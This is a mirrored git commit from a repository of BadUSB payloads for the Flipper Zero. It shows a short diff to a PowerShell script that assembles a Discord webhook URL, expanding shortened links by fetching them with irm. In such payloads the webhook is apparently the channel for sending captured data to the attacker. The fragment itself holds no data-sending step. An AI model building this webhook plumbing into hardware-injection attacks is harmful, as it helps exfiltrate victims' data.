mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-12 07:40:44 -08:00
Update main.ps1
This commit is contained in:
@@ -1,6 +1,7 @@
|
||||
$whuri = "$dc"
|
||||
# shortened URL Detection
|
||||
if ($whuri.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $whuri = (irm $whuri).url}
|
||||
if ($whuri.Length -lt 120){
|
||||
$whuri = ("https://discord.com/api/webhooks/" + "$dc")
|
||||
}
|
||||
|
||||
$outfile=""
|
||||
$a=0
|
||||
|
||||
Reference in New Issue
Block a user